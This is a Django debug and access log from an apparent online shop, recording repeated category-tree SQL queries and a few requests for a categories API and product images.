2019-12-25 06:18:56,118 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-25 06:18:56,121 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-25 06:18:56,123 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-25 06:18:56,127 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-25 06:18:56,129 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-25 06:18:56,131 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-25 06:18:56,133 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-25 06:18:56,136 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-25 06:18:56,139 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-25 06:18:56,141 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-25 06:18:56,144 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-25 06:18:56,146 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-25 06:18:56,148 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-25 06:18:56,152 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-25 06:18:56,154 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-25 06:18:56,156 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-25 06:18:56,158 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-25 06:18:56,160 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-25 06:18:56,163 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-25 06:18:56,165 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-25 06:18:56,168 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-25 06:18:56,170 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-25 06:18:56,173 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-25 06:18:56,175 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [25/Dec/2019 06:18:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [25/Dec/2019 06:18:57] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [25/Dec/2019 06:18:57] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [25/Dec/2019 06:30:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-25 06:30:36,771 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-25 06:30:36,777 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-25 06:30:36,781 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-25 06:30:36,783 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-25 06:30:36,786 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-25 06:30:36,789 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-25 06:30:36,791 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-25 06:30:36,793 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-25 06:30:36,795 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-25 06:30:36,798 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-25 06:30:36,801 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-25 06:30:36,803 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-25 06:30:36,805 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-25 06:30:36,807 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-25 06:30:36,810 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-25 06:30:36,813 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-25 06:30:36,815 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-25 06:30:36,817 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-25 06:30:36,819 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-25 06:30:36,823 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-25 06:30:36,825 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-25 06:30:36,827 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-25 06:30:36,829 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-25 06:30:36,832 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-25 06:30:36,834 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-25 06:30:36,837 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-25 06:30:36,840 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-25 06:30:36,842 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-25 06:30:36,844 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-25 06:30:36,846 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-25 06:30:36,850 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-25 06:30:36,852 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-25 06:30:36,854 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-25 06:30:36,856 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-25 06:30:36,858 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-25 06:30:36,862 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-25 06:30:36,864 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-25 06:30:36,866 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-25 06:30:36,868 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-25 06:30:36,870 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-25 06:30:36,873 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-25 06:30:36,875 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-25 06:30:36,877 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY 